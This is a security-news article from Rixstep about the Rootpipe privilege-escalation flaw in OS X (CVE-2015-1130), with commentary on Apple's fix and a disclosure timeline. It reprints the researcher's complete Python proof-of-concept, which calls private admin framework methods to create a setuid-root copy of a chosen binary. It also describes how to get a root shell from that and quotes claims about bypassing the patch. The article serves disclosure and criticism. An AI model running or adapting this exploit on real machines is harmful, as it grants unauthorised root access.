Rixstep
	`About \| ACP \| Buy \| Industry Watch \| Learning Curve \| News \| Products \| Search \| Substack`

Home » Industry Watch

Smokin' Rootpipe

Sometimes the smell lingers on.

Get It

Try It

CUPERTINO (Rixstep) — On 2 October 2014, Swedish security researcher Emil Kvarnhammar made a startling discovery. It was reported in the evening tabloid Aftonbladet a mere eight days later.

Emil had discovered a privilege escalation 'hack' - he called it a backdoor.

The 'MO' of what he discovered was straightforward: there was an XPC service that allowed privilege escalation - even from a non-admin account - through a method used to create files.

He called his hack 'Rootpipe'. The source code for his PoC follows.

########################################################
#
#  PoC exploit code for rootpipe (CVE-2015-1130)
#
#  Created by Emil Kvarnhammar, TrueSec
#
#  Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
#
########################################################
import os
import sys
import platform
import re
import ctypes
import objc
import sys
from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
from Foundation import NSAutoreleasePool

def load_lib(append_path):
    return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path);

def use_old_api():
    return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])

args = sys.argv

if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)

source_binary = args[1]
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()
    tool = st.tool()
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
else:
    adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
    WriteConfigClient = objc.lookUpClass("WriteConfigClient")
    client = WriteConfigClient.sharedClient()
    client.authenticateUsingAuthorizationSync_(None)
    tool = client.remoteProxy()

    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)

print "Done!"

del pool

What's Going On?

What's going on? The code sees that a SUID binary (04777) is created. (SUID scripts can be disabled at boot.) All one needs after that is enough code in the binary to open a root shell. Two lines code tops. A discovery made later was that by passing a nil value for authref on 10.9 or later it can be made to work as well - even from non-admin accounts.

# authref with value nil is not accepted on OS X <= 10.8

The entire process can more or less be automated. By anyone anywhere.

The Hunt After October

Emil contacted Apple already the day after his discovery, and his company (TrueSec) and Apple came to an agreement about keeping silent about it all.

Rootpipe is a bit of déjà vu all over again, especially for those who've seen Opener and that curious propensity, starting with Safari 4.0.5, to install without authentication. There wasn't much of a murmur back then, and there's certainly not much of a murmur now: sporadic comments on social media ask demurely if Rootpipe will ever be fixed; further comments ask why the MSM are keeping so silent about it, now that the initial tempest in the teapot's been covered to their satisfaction.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>InstallAtLogout</key>
    <array>
        <string>061-7784</string>
    </array>
    <key>ProductPaths</key>
    <dict>
        <key>061-7784</key>
        <string>061-7784</string>
    </dict>
</dict>
</plist>

You can't place files in /Library/Updates without root privileges - you can't place anything in /var/db either - yet from one version of OS X to the next, where previously you of course needed to authenticate, you suddenly didn't need to authenticate at all. Meaning there's been a 'cheat' in OS X since at least March 2010 - and considering Opener, a lot longer.

What the heck were they thinking?

There are those who claim the Rootpipe hole has finally been plugged, but there seems to be no corroboration at this point. Another researcher claims that the hole can still be exploited - even after the 10.10.3 update.

Yeap their fix doesn't fix anything and that was clear the moment they only use entitlements as a fix. The trick here is to exploit any of the authorized binaries to run code. DYLD_ will not work because dyld will always clear it on these binaries. Using task_for_pid will trigger the password prompt which isn't silent and for that there's no need to use rootpipe for anything.

More Than Elegance

There's elegance in simplicity, said the Bell Labs gurus. But there's more than elegance - there's also maintainability and robustness. The legacy handed to NeXT and Apple with FreeBSD was considerable; not only is it way too much work to continually revise FreeBSD code that comes in, it's also imprudent: open source code can have been tested by hundreds, thousands, tens of thousands; OpenBSD even had a dedicated bug-hunter special staff; but playing with security by dreaming up doodads and new features that cannot have been adequately tested - that's just nuts.

Apple have been hit time and again - not through weaknesses in the 'rock solid foundation', but through the full retard ideas they've had about adding feature sets to that foundation.

Maybe it's time they stopped. Maybe it's time Sir Tim and his immediate staff - who most likely have no clue what's really going on - take a closer look themselves. The company with the biggest market cap in the world - with an unbelievable product lineup today - can make sure the 'Scott Forstall discards' don't undermine the corporation's interests anymore.

Oct 2nd 2014: First discovery
Oct 3rd 2014: First contact with Apple Product Security Team
Oct 14th 2014: Exploit code shared with Apple
Oct 24th 2014: Initial full disclosure date set to Jan 12th 2015
Oct 16th 2014: Release of OS X 10.10 Yosemite, vulnerable to rootpipe
Nov 14th 2014: Apple requested to postpone disclosure
Nov 17th 2014: Release of OS X 10.10.1, also vulnerable
Jan 12th 2015: Joint decision between Apple and TrueSec to postpone disclosure due to the amount of changes required in OS X
Jan 16th 2015: CVE-2015-1130 created by Apple
Jan 27th 2015: Release of OS X 10.10.2, also vulnerable
March 2nd 2015: Release of OS X 10.10.3 public beta, issue solved
April 1st 2015: Apple confirmed that release is coming the second week of April
April 8th 2015: Release of OS X 10.10.3
April 9th 2015: Full disclosure

Details on the #rootpipe exploit will be presented, but not now. Let's just give Apple some time to roll out a patch to affected users.
- Emil Kvarnhammar 16 October 2014